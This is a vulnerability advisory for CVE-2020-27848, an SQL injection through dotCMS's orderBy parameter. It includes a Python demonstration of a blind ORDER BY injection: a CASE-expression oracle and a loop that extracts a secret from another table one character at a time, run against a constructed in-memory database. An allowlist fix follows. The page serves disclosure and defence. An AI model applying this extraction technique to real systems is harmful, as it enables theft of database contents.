Vulnerability Description
dotCMS before 20.10.1 allows SQL injection, as demonstrated by the orderby parameter of the /api/v1/containers endpoint. The PaginatorOrdered classes used to paginate the results of REST endpoints do not sanitize the orderBy parameter, and in some cases this is exploitable for SQL injection. Because an ORDER BY clause cannot be supplied as a bind parameter, the only sound fix is to validate the value against an allowlist of column names before it reaches the query text. A user must be an authenticated manager in the dotCMS system to exploit this vulnerability.
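The following is an added illustration, not dotCMS code (which is Java): a Python/sqlite3 analogue with a constructed `containers` table showing why an unvalidated orderBy string is exploitable even when the driver executes only one statement per query, and the allowlist check that closes the hole. The function names `vulnerable_list`, `order_oracle`, `leak_secret`, `parse_orderby` and `safe_list`, the `secrets` table and its contents are all assumptions made for the example.

```python
from __future__ import annotations

import re
import sqlite3
import string

# Constructed sample data (assumed, not dotCMS's real schema): a containers
# table the endpoint lists, and an unrelated table the caller must never read.
_conn = sqlite3.connect(":memory:")
_conn.executescript("""
CREATE TABLE containers (inode INTEGER PRIMARY KEY, title TEXT, mod_date TEXT);
INSERT INTO containers VALUES (1, 'zeta',  '2020-01-03');
INSERT INTO containers VALUES (2, 'alpha', '2020-01-01');
INSERT INTO containers VALUES (3, 'mu',    '2020-01-02');
CREATE TABLE secrets (name TEXT, value TEXT);
INSERT INTO secrets VALUES ('api_key', 'k7');
""")


def vulnerable_list(orderby: str) -> list[str]:
    """The flawed pattern: the caller's orderBy string is pasted into the SQL.
    ORDER BY cannot be supplied as a bind parameter, so string validation is
    the only defence, and this function has none."""
    sql = f"SELECT title FROM containers ORDER BY {orderby}"
    return [row[0] for row in _conn.execute(sql)]


def order_oracle(condition: str) -> bool:
    """Boolean oracle built purely from sort order. sqlite3 refuses stacked
    statements, so a ';'-based payload fails here, but a CASE expression in
    ORDER BY is a single statement: when `condition` is true the rows sort by
    title, otherwise by inode, and the attacker can tell the two apart."""
    payload = f"(CASE WHEN ({condition}) THEN title ELSE inode END)"
    return vulnerable_list(payload) == ["alpha", "mu", "zeta"]


def leak_secret(max_len: int = 8) -> str:
    """Recover secrets.value for 'api_key' one character at a time, using
    nothing but the ordering of the container listing."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in string.ascii_lowercase + string.digits:
            cond = (f"(SELECT substr(value,{pos},1) FROM secrets "
                    f"WHERE name='api_key')='{ch}'")
            if order_oracle(cond):
                recovered += ch
                break
        else:
            break  # no candidate matched: end of the value
    return recovered


# Hardened version: map the untrusted string onto an allowlist of column
# names and directions, and never let the raw input reach the SQL text.
ALLOWED_COLUMNS = {"inode", "title", "mod_date"}
_ORDERBY_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)(?:\s+(asc|desc))?\s*$",
                         re.IGNORECASE)


def parse_orderby(orderby: str) -> tuple[str, str] | None:
    """Return (column, direction) if orderby is an allowlisted column with an
    optional asc/desc, else None. Anything else is rejected outright."""
    m = _ORDERBY_RE.match(orderby)
    if not m or m.group(1).lower() not in ALLOWED_COLUMNS:
        return None
    return m.group(1).lower(), (m.group(2) or "asc").upper()


def safe_list(orderby: str) -> list[str]:
    """Same listing, but the SQL is assembled only from validated tokens."""
    parsed = parse_orderby(orderby)
    if parsed is None:
        raise ValueError(f"rejected orderBy value: {orderby!r}")
    column, direction = parsed
    sql = f"SELECT title FROM containers ORDER BY {column} {direction}"
    return [row[0] for row in _conn.execute(sql)]


if __name__ == "__main__":
    print("vulnerable, plain:", vulnerable_list("title"))
    print("vulnerable, leaked secret:", leak_secret())
    print("safe:", safe_list("mod_date desc"))
    print("safe, injection rejected:",
          parse_orderby("(CASE WHEN 1=1 THEN title ELSE inode END)"))
```

The point of `order_oracle` is that the attacker needs no error messages and no stacked statements: the sort order of an ordinary listing is enough of a side channel to pull data out of any table the database user can read, one bit per request. The hardened path never interpolates the caller's bytes; it interpolates only tokens it chose itself after matching the input against the allowlist.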
CVSS Score
8.8 (HIGH)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| Dotcms | Dotcms | < 20.10.1 |
Related Weaknesses (CWE)
References
- https://github.com/dotCMS/core/compare/v5.3.8.1...v20.10.1 (Patch, Third Party Advisory)
- https://github.com/dotCMS/core/issues/19500 (Exploit, Third Party Advisory)
FAQ
What is CVE-2020-27848?
CVE-2020-27848 is a vulnerability with a CVSS base score of 8.8 (HIGH). dotCMS before 20.10.1 allows SQL injection, as demonstrated by the orderby parameter of the /api/v1/containers endpoint. The PaginatorOrdered classes used to paginate the results of REST endpoints do not sanitize the orderBy parameter, and in some cases this is exploitable for SQL injection. Exploitation requires an authenticated manager account.
How severe is CVE-2020-27848?
CVE-2020-27848 has been rated HIGH with a CVSS base score of 8.8/10. The score reflects that the attack is network-reachable through the REST API but requires an authenticated manager account.
Is there a patch for CVE-2020-27848?
Yes. dotCMS 20.10.1 contains the fix; the compare link in the references section above shows the changes between v5.3.8.1 and v20.10.1. Affected product: dotCMS, all versions before 20.10.1.